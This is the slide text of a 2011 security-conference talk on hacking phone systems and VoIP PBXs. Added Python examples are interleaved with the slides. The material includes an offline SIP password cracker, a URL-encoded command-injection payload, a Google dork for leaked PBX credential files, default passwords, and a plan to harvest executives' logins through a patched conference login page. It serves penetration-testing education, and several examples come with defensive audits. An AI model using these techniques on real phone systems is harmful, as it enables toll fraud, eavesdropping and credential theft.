Owning Phone Systems: Why it (still) matters
Thotcon, 2011
Sunday, May 15, 2011
Josh “savant42” Brashars, AppSec Consulting
Obligatory “WTF are you?” slide
Pen Tester
Sometimes “telephone enthusiast”
Co-Founder of Mayhemic Labs
dc949
But before we begin...
My Wife = APT
My Wife = APT. Seriously.
Some quick math (Frank^2 loves math)
let “d” = Defcon
let “m” = Months
x = (d * 19) - (m * 9)
And then...
No Defcon.
Owning Phones
Why this talk?
Phones have been around a long time
Tech may change but basic premise is the same
Everywhere
Pen Testers
Always about the new hotness
Don’t care about the old and busted.
As a result...
Security stopped being important
PBXs became more complex, more obscure
“Nobody is attacking phones anymore”
“Phreaking is dead”
Any creature without a predator...
Remember when web “sites” became “applications?”
An orgy of shitty coding
“We’ll secure it later!”
(Or... never.)
Needlessly Complex
So now we have all these horny bunnies...
Hundreds of vendors
Acquisitions, Mergers, Leasing, Rebranding
In summary...
Telephones, one of the most important assets a business can possess, are more broken than they have ever been.
Without the phones, most businesses will hurt.
Phones are “trusted”
Phones make money.
Money for Pen tests.
...and money to go to Thotcon.
In short, hack harder.
Pen Test Engagements
Did you make sure to ask? (scope)
How hard do you look at them?
How well do you know telephony?
The good news?
The good news? (for pen testers)
Easier than ever.
But first...
Old School
Sweet!
Scaling!
Redundant!
Secure!
...uh, how to do routing?
Let’s use sound! In-Band Signaling
In-Band Signaling
Secret tones within the existing channel
Security Through Obscurity
What could go wrong?!
Blind telephone enthusiasts figured it out
Could drop call by whistling
Bell technical journal published frequencies
Phone phreaking is born.
Making it Happin’
Blind phreaks used cassettes and pianos to create Multi-Frequency (MF) tones
Met John “Capt. Crunch” Draper
Discovered the Cap’n Crunch bosun whistle could produce the 2600 Hz tone and seize a trunk
Crunch created electronic device to phreak
Toll fraud is huge
Production of “Blue Boxes” ignites, Metasploit for phones
Even Woz and Jobs get in on it.
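The in-band signaling story above, as an added example that is not code from the talk: it synthesizes the 2600 Hz supervisory tone and the Bell R1 MF pairs a blue box sent (KP, the digits, ST), then recovers them from the audio with a Goertzel tone detector, the same single-frequency filter a switch or a fraud detector would run. The 70 ms pulse timing is an assumption picked so that every tone lands exactly on a DFT bin; it is not taken from the slides.

```python
"""In-band signaling in code: synthesize the 2600 Hz supervisory tone and the
Bell R1 multi-frequency (MF) pairs a blue box sent, then pull them back out of
the audio with a Goertzel detector.  Added example, not code from the talk;
the 70 ms pulse is an assumption chosen so every tone sits on a DFT bin."""
import math

SAMPLE_RATE = 8000      # one digital voice channel
PULSE = 0.07            # 70 ms tone, 70 ms gap (assumed timing)
SUPERVISORY = 2600      # single-frequency tone that said "this trunk is idle"

# Bell R1 MF: each symbol is two of six frequencies played together.
MF_TONES = {
    "1": (700, 900),   "2": (700, 1100),  "3": (900, 1100),
    "4": (700, 1300),  "5": (900, 1300),  "6": (1100, 1300),
    "7": (700, 1500),  "8": (900, 1500),  "9": (1100, 1500),
    "0": (1300, 1500),
    "KP": (1100, 1700),   # key pulse: start of address
    "ST": (1500, 1700),   # start: end of address, route the call
}
MF_FREQS = (700, 900, 1100, 1300, 1500, 1700)

def tone(freqs, seconds=PULSE, amp=0.4):
    """Samples in [-1, 1] of the given frequencies summed."""
    n = int(SAMPLE_RATE * seconds)
    return [sum(amp * math.sin(2 * math.pi * f * i / SAMPLE_RATE) for f in freqs)
            for i in range(n)]

def goertzel(frame, freq):
    """Power of one frequency in a frame: a single-bin DFT, the classic tone detector."""
    n = len(frame)
    k = int(0.5 + n * freq / SAMPLE_RATE)
    coeff = 2 * math.cos(2 * math.pi * k / n)
    s1 = s2 = 0.0
    for x in frame:
        s1, s2 = x + coeff * s1 - s2, s1
    return s1 * s1 + s2 * s2 - coeff * s1 * s2

def detect_mf(frame, min_power=1.0, ratio=0.3):
    """The MF symbol whose two frequencies dominate the frame, else None."""
    power = {f: goertzel(frame, f) for f in MF_FREQS}
    ranked = sorted(MF_FREQS, key=power.get, reverse=True)
    if power[ranked[0]] < min_power or power[ranked[1]] < ratio * power[ranked[0]]:
        return None
    pair = tuple(sorted(ranked[:2]))
    return next((sym for sym, f in MF_TONES.items() if f == pair), None)

def has_2600(frame, ratio=10.0):
    """True when 2600 Hz dominates the band: someone is whistling at the trunk."""
    loudest_mf = max(goertzel(frame, f) for f in MF_FREQS)
    return goertzel(frame, SUPERVISORY) > ratio * max(loudest_mf, 1e-9)

def blue_box(number):
    """Audio of a blue-box call: 2600 Hz to seize the trunk, then KP, digits, ST."""
    gap = [0.0] * int(SAMPLE_RATE * PULSE)
    out = tone([SUPERVISORY]) + gap
    for sym in ["KP", *number, "ST"]:
        out += tone(MF_TONES[sym]) + gap
    return out

def decode(samples):
    """Frame the audio at the pulse cadence and label each frame."""
    frame = int(SAMPLE_RATE * PULSE)
    symbols = []
    for start in range(0, len(samples) - frame + 1, 2 * frame):
        chunk = samples[start:start + frame]
        if has_2600(chunk):
            symbols.append("2600")
        else:
            sym = detect_mf(chunk)
            if sym:
                symbols.append(sym)
    return symbols

if __name__ == "__main__":
    print(decode(blue_box("2125551212")))
```

The detector side is the point: once the frequencies were published, anything that could hear the channel could both read and write the control signaling, which is exactly what “security through obscurity” had been relying on nobody doing.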
Genie is out of the bottle
Kids are controlling the phone network
Mafia and Political Dissidents get in on it
“Hacker” culture is in full swing
Phones are Owned.
And then...
The King is Dead(ish)
Party continued full swing until switches went digital
Control channels are (mostly) no longer in-band
We’re cool now, right?
Wrong.
Digital Era
Phone switches are basically giant computers.
Computers with modems.
Damn kids.
As technology improves, so do attackers
Skill requirement goes up, somewhat
Mafia and Activists are less involved, but hacking remains rampant
Damn kids.
Personal computers boom, BBSes are born
“K-Rad boards” lead to more fraud
Long Distance is $$$++
Victimless crime?
Highly Skilled Attackers
Toll fraud leads the way to owning digital switches
LOD, Masters of Deception (MoD), etc...
Pranking!
Why does my house phone ask me for coins?!?
Eavesdropping
Highly Skilled Attackers (continued)
Calls are maliciously re-routed
Denial of Service
Dogs and cats, living together.
Mass Hysteria.
NO CARRIER
R.I.P.
Increased interest in hacking computers
Phone phreaking dies down
Long distance calls become reasonable
IP is the new hotness
BBSes are mostly gone
We’re cool NOW, right?
...
The Honeymoon
Phone calls are now dirt cheap.
As little as .02 CENTS per minute.
Business is STOKED.
Who really cares about toll fraud?
Old becomes new.
Retro is in.
Old attacks, new techniques
Interception is now trivial.
Caller ID Spoofing
Voice Mail Attacks
Swatting
Paris Hilton
Fast forward to...
Today.
The honeymoon is over.
VoIP is everywhere
VoIP has been talked about to death
Everyone uses VoIP.
Let’s get down to it.
Threat Modeling
Attack Vectors
Trust and Social Engineering Attacks
Information Disclosure
Interception
OS Attacks
Toll Fraud
Denial of Service
Trust
Caller ID Spoofing
This is Jim From IT Services, I hear your computer is running slowly?
This is CEO Jim, gimme your passwords!
Trust
VoIP Hopper
http://voiphopper.sourceforge.net/
Hop...er... VoIP. (It mimics an IP phone’s CDP, LLDP-MED or DHCP exchange to learn the voice VLAN ID and tags its own traffic into it, so the “separate” voice network is one script away from the data network.)
Information Disclosure
Convergence is here to stay.
“WebEx” style conferencing
Proprietary data uploaded as slide decks
“Confidential”, “Partner Only”
Saved to the file system
Information Disclosure
Call Logs tell you who calls who
The CEO sure does call his secretary a lot.
Like, a LOT, a lot.
Dude, I think the CEO is @#%ing the secretary.
BLACKMAIL!
Interception
The old way
The New Way.
Interception
Protocol attacks to eavesdrop on calls
SIP credentials are trivial to steal and re-use.
MITM
• PBX -> Attacker PBX -> Tubes
• Trivial to record, deny, etc.
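The credential theft and re-use point above in code, added here and not part of the talk. A sniffed REGISTER carries the username, realm, nonce, URI and the MD5 digest response; only the password is missing, and it falls to an offline dictionary run against that response (the same arithmetic sipdump/sipcrack do). The captured request, the realm, the nonce and the password “changeme” are all constructed for the example.

```python
"""SIP digest credentials are 'trivial to steal and re-use' because a sniffed
REGISTER carries everything except the password, and the password is one
offline dictionary run away.  Added example, not code from the talk; the
captured request below is constructed (realm, nonce and the weak password
'changeme' were chosen for illustration)."""
import hashlib
import re

def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()

def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """RFC 2617 digest as SIP (RFC 3261) uses it; qop=auth variant included."""
    ha1 = md5hex(f"{username}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    if qop:
        return md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")

PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')

def parse_authorization(header):
    """'Digest username="1001", realm="asterisk", ...' -> dict of parameters."""
    _scheme, _, params = header.partition(" ")
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in PARAM.finditer(params)}

def parse_request(raw):
    """Request-line method plus a lower-cased header dict."""
    lines = raw.split("\r\n")
    method = lines[0].split(" ", 1)[0]
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, headers

def crack(captured_request, wordlist):
    """Offline dictionary attack on the Authorization header of a sniffed request."""
    method, headers = parse_request(captured_request)
    p = parse_authorization(headers["authorization"])
    for guess in wordlist:
        if digest_response(p["username"], p["realm"], guess, method, p["uri"], p["nonce"],
                           p.get("qop"), p.get("nc"), p.get("cnonce")) == p["response"]:
            return guess
    return None

def forge_authorization(username, realm, password, method, uri, nonce):
    """Re-use: answer a fresh challenge as the victim once the password is known."""
    resp = digest_response(username, realm, password, method, uri, nonce)
    return (f'Digest username="{username}", realm="{realm}", nonce="{nonce}", '
            f'uri="{uri}", response="{resp}", algorithm=MD5')

# --- constructed capture: what a sniffer on the voice VLAN would hand you ---
VICTIM = dict(username="1001", realm="asterisk", method="REGISTER",
              uri="sip:pbx.example.com", nonce="5c3e1a9f2b7d")
CAPTURED = (
    "REGISTER sip:pbx.example.com SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 10.10.20.31:5060;branch=z9hG4bK7a1\r\n"
    "From: <sip:1001@pbx.example.com>;tag=1c3\r\n"
    "To: <sip:1001@pbx.example.com>\r\n"
    "Call-ID: 8e4d0c@10.10.20.31\r\n"
    "CSeq: 2 REGISTER\r\n"
    "Authorization: " + forge_authorization(password="changeme", **VICTIM) + "\r\n"
    "Content-Length: 0\r\n\r\n"
)
WORDLIST = ["1234", "1001", "password", "secret", "changeme", "letmein"]

if __name__ == "__main__":
    print("cracked:", crack(CAPTURED, WORDLIST))
```

Nothing here needs the PBX: a single captured REGISTER is enough, and extension-sized passwords (1001, 1234, changeme) fall in milliseconds. The only real defenses are TLS for signaling, real secrets, and rate limiting on failed registrations.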
Wireless.
OS Attacks
Who patches the phone system? Sys admins? The telephony guys?
Not *MY* Problem, right?
Default passwords.
“changeme”
Toll Fraud
Easier than ever before
Like Perl, there’s more than one way to do it wrong.
Dial Plan Logic Errors = Outbound trunks
Default Telnet or VxWorks credentials
Toll Fraud
Voicemail Collect Charges Attack
Stealing Credentials
Google for sip.conf & iax.conf
Denial of Service
Child’s play.
Web Interfaces (Hi Raf!)
A whole new way to fail.
Web Interfaces
Ease of Use = Ease of Compromise
Inherit the OWASP Top 10+++
Just one example.
intitle:”index.of” (sip.conf | iax.conf) “last.modified”
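An added example (not from the talk, and not Asterisk’s own code) that serves both the Toll Fraud slides (dial plan logic errors reaching an outbound trunk, stolen sip.conf credentials) and the dork above: once a sip.conf/extensions.conf pair is in hand, this audit flags weak or missing secrets, allowguest left at its default, and an inbound context that includes its way to a trunk. The parser is a minimal stand-in, both config pairs are constructed, and the fixed pair shows the corrections.

```python
"""Audit an Asterisk sip.conf/extensions.conf pair for the toll-fraud mistakes
above: weak or missing SIP secrets, guest calls left on, and a dial plan where
an unauthenticated context includes its way to an outbound trunk.  Added
example: minimal stand-in parser (not Asterisk's); both config pairs constructed."""
import re

WEAK = {"1234", "changeme", "password", "secret", "123456"}
DIAL = re.compile(r"Dial\((?:SIP|IAX2)/([^,)]+)")

def parse_conf(text):
    """{section: [(key, value), ...]}; handles key=value, key => value, ; comments."""
    sections, cur = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("["):
            cur = line[1:line.index("]")]
            sections.setdefault(cur, [])
        elif "=" in line:
            k, v = line.split("=>", 1) if "=>" in line else line.split("=", 1)
            sections[cur].append((k.strip(), v.strip()))
    return sections

def get(section, key):
    return next((v for k, v in section if k == key), None)

def reachable(plan, start):
    """Contexts reachable from `start` through include => lines, transitively."""
    seen, todo = set(), [start]
    while todo:
        ctx = todo.pop()
        if ctx in seen or ctx not in plan:
            continue
        seen.add(ctx)
        todo += [v for k, v in plan[ctx] if k == "include"]
    return seen

def dial_peer(app):
    """Peer named by Dial(SIP/${EXTEN}@peer) or Dial(SIP/peer/${EXTEN}), else None."""
    m = DIAL.search(app)
    target = m.group(1) if m else ""
    return target.split("@", 1)[1] if "@" in target else target.split("/", 1)[0] or None

def audit(sip_conf, extensions_conf):
    sip, plan = parse_conf(sip_conf), parse_conf(extensions_conf)
    general, findings = sip.get("general", []), []
    if (get(general, "allowguest") or "yes").lower() != "no":   # chan_sip default: yes
        findings.append("allowguest is not 'no': anonymous INVITEs enter the guest context")
    trunks = {n for n, s in sip.items()
              if n != "general" and get(s, "host") not in (None, "dynamic")}
    entry = {get(general, "context") or "default"}            # where guests land
    for name, s in sip.items():
        if name == "general" or name in trunks:
            continue
        secret = get(s, "secret")
        if not secret or secret == name or secret.lower() in WEAK:
            findings.append(f"peer {name}: missing or weak secret")
            if get(s, "context"):
                entry.add(get(s, "context"))                   # as good as unauthenticated
    for start in sorted(entry):
        for ctx in sorted(reachable(plan, start)):
            for k, v in plan[ctx]:
                if k != "exten":
                    continue
                pattern, _, app = (v.split(",", 2) + ["", ""])[:3]
                if pattern.startswith("_") and dial_peer(app) in trunks:
                    findings.append(f"context {start} reaches {ctx}: pattern {pattern} dials out via trunk {dial_peer(app)}")
    return findings

VULNERABLE_SIP = """
[general]
context=from-trunk   ; guests land here; allowguest left at its default
[provider]
type=peer
host=sip.provider.example
secret=Tr0nk-Sup3r-Secret
[1001]
type=friend
host=dynamic
context=internal
secret=1001          ; secret equals the extension
[1002]
type=friend
host=dynamic
context=internal     ; no secret at all
"""
VULNERABLE_EXTENSIONS = """
[from-trunk]
exten => 5551000,1,Dial(SIP/1001)
include => internal  ; the logic error: inbound inherits internal dialing...
[internal]
exten => _1XXX,1,Dial(SIP/${EXTEN})
include => outbound  ; ...which inherits the trunk
[outbound]
exten => _9X.,1,Dial(SIP/${EXTEN:1}@provider)
"""
# The fix: refuse guests, give every peer a real secret, never include inward from an inbound context.
FIXED_SIP = (VULNERABLE_SIP
             .replace("context=from-trunk", "context=from-trunk\nallowguest=no")
             .replace("secret=1001", "secret=Vq7-mR2p-Lx9c-Tq4z")
             .replace("[1002]\ntype=friend", "[1002]\ntype=friend\nsecret=Hs4-wN8k-Qz1b-Yv6m"))
FIXED_EXTENSIONS = VULNERABLE_EXTENSIONS.replace("include => internal", "; include => internal")
```

Running audit() over the vulnerable pair reports the guest setting, both weak peers, and the chain from-trunk → internal → outbound → provider; the fixed pair comes back clean. On a real engagement the dork, a TFTP pull or a leaked backup gives you the files, and this is the first thing to run on them.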
Remember when we had to scan for codes?
TFTP?!? (Phones pull their provisioning files, SIP credentials included, from a TFTP server that authenticates nobody.)
Remember when we had to wardial for this?
Derail: War Dialing
iWAR by da Beave
WarVOX by HDM
ToneLoc (yes, people still use it)
Slow or Expensive. You pick.
Pro Tip:
• CNAM lookups!
• Backspoof
• HTTP API
Google for Asterisk + “CallerID” or “Asterisk CNAM”
$0.002 a query
(roughly one share of LGTT)
Oh, right...
Where was I?
Case Study: Owning the whole network via the phone
(not talking about SE here)
ShoreTel Conference
• “Convergence” - IM, Conference, WebEx
• Super secret software (Linux, shhh!)
• No root for you!
admin / changeme
via Burp Suite
syscmds.cgi
Oops.
%26 is != “|”. The filter strips the pipe character, but a URL-encoded ampersand (%26) walks straight past it into the shell. This is why phone people shouldn’t write webapps.
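The %26 bug in miniature, as an added Python example; the talk does not say what language syscmds.cgi was written in or which diagnostic it wrapped, so the echo stand-in and the exact filter are assumptions. The vulnerable version strips “|” and concatenates the rest into a shell command line; the hardened version allowlists the parameter and passes an argv list with no shell at all.

```python
"""The syscmds.cgi mistake in miniature: a denylist that strips "|" but not "&",
so an attacker URL-encodes the ampersand (%26) and the shell runs a second
command as the web server user.  Added example in Python; the talk does not say
what the real CGI was written in or which diagnostic it wrapped, so the `echo`
stand-in and the filter details below are assumptions."""
import re
import subprocess
from urllib.parse import unquote

def vulnerable_command(query_value):
    """What the CGI effectively did: URL-decode, strip the one metacharacter it
    knew about, then build a shell command line by string concatenation."""
    target = unquote(query_value).replace("|", "")   # "|" is filtered, "&" is not
    return f"echo diagnostic for {target}"            # stand-in for ping/traceroute (assumed)

def run_vulnerable(query_value):
    """Hand the string to /bin/sh exactly as a shell-out in a CGI would."""
    proc = subprocess.run(["/bin/sh", "-c", vulnerable_command(query_value)],
                          capture_output=True, text=True, check=False)
    return proc.stdout

# Allowlist: a hostname or dotted IPv4 address and nothing else.
TARGET_RE = re.compile(r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?"
                       r"(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*$")

def hardened_command(query_value):
    """Validate against the allowlist and return argv: no shell, so no metacharacters."""
    target = unquote(query_value)
    if not TARGET_RE.match(target):
        raise ValueError(f"rejected target {target!r}")
    return ["echo", "diagnostic", "for", target]

def run_hardened(query_value):
    proc = subprocess.run(hardened_command(query_value),
                          capture_output=True, text=True, check=False)
    return proc.stdout

if __name__ == "__main__":
    payload = "10.0.0.5%26echo%20INJECTED"   # the parameter as sent, before decoding
    print(run_vulnerable(payload))            # two commands run, the second attacker-chosen
    try:
        run_hardened(payload)
    except ValueError as e:
        print("hardened:", e)
```

Note that a longer denylist (“;”, “&”, backticks, “$(”) is not the fix either; the fix is the argv list plus an allowlist, which is what the hardened half does.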
Savant, who cares? ‘nobody’ is a nobody.
Nightly automated backups.
...and it is run by root.
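The check to run when a low-privilege web user (nobody, in the case study) shares a box with a root cron job, as an added example that is not from the talk: parse an /etc/crontab-style schedule, find every path a root job executes, and flag the ones a non-root user can modify or replace. The crontab, the scripts and the weakness (a world-writable rotate script) are constructed in a temp directory; the talk does not describe how the real backup was abused.

```python
"""When the web server runs as 'nobody' and a nightly backup runs as root, the
question is whether anything that root job executes is writable by nobody.
Added example: builds a throwaway crontab and scripts in a temp directory to
show the check; the talk does not describe the real backup job, so the paths
and the weakness (a world-writable script) are constructed."""
import os
import shlex
import stat
import tempfile

def job_paths(crontab_line):
    """(user, paths) for an /etc/crontab-style line: 5 time fields, user, command."""
    fields = crontab_line.split(None, 6)
    if len(fields) < 7 or crontab_line.lstrip().startswith("#"):
        return None, []
    user, command = fields[5], fields[6]
    return user, [tok for tok in shlex.split(command) if "/" in tok]

def writable_by_others(path):
    """True if group/other can write the file, or other can replace it in its directory."""
    mode = os.stat(path).st_mode
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        return True
    dmode = os.stat(os.path.dirname(path) or ".").st_mode
    return bool(dmode & stat.S_IWOTH) and not (dmode & stat.S_ISVTX)

def audit_crontab(text, privileged_users=("root",)):
    """Findings for privileged jobs whose referenced files a lesser user could hijack."""
    findings = []
    for line in text.splitlines():
        user, paths = job_paths(line)
        if user not in privileged_users:
            continue
        for p in paths:
            if not os.path.exists(p):
                findings.append(f"{user} job references missing path {p} (creatable by someone else?)")
            elif writable_by_others(p):
                findings.append(f"{user} job runs {p}, which a non-{user} user can modify")
    return findings

def demo():
    """Constructed fixture: one safe and one hijackable nightly backup script."""
    d = tempfile.mkdtemp(prefix="pbx-backup-")
    safe, loose = os.path.join(d, "backup.sh"), os.path.join(d, "rotate.sh")
    for p in (safe, loose):
        with open(p, "w") as f:
            f.write("#!/bin/sh\ntar czf /var/backups/pbx.tgz /etc/pbx\n")
    os.chmod(safe, 0o755)
    os.chmod(loose, 0o777)      # the mistake: anyone, 'nobody' included, can edit it
    crontab = (
        "# nightly PBX backups\n"
        f"0 2 * * * root /bin/sh {safe}\n"
        f"30 2 * * * root {loose}\n"
        "0 3 * * * nobody /usr/local/bin/cleanup-tmp\n"
    )
    return audit_crontab(crontab)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Whatever is flagged is a root shell at 02:30: append a line to the script and wait. The same check belongs in the build pipeline for any appliance image, phone system or otherwise.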
john (John the Ripper, on the recovered password hashes)
“Ok, so that’s one box, impress me.”
Remember this? Yeah, that’s Active Directory enabled.
Simple to patch.
• Tweak login page to capture credentials to file.
• Same host, no problems with SSL cert
• Schedule a conference with CEO, IT, Ops.
I accidentally the whole org chart.
MSF Module(s)
• ShoreTel Brute by Keith Leigh
• http://code.google.com/p/shoretel-brute/
• MSF Root payload module coming soon.
Questions? @savant42 on the twitters